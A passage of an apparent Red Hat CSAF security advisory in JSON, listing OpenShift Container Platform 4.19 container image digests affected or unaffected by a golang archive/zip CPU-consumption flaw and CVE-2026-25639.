"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
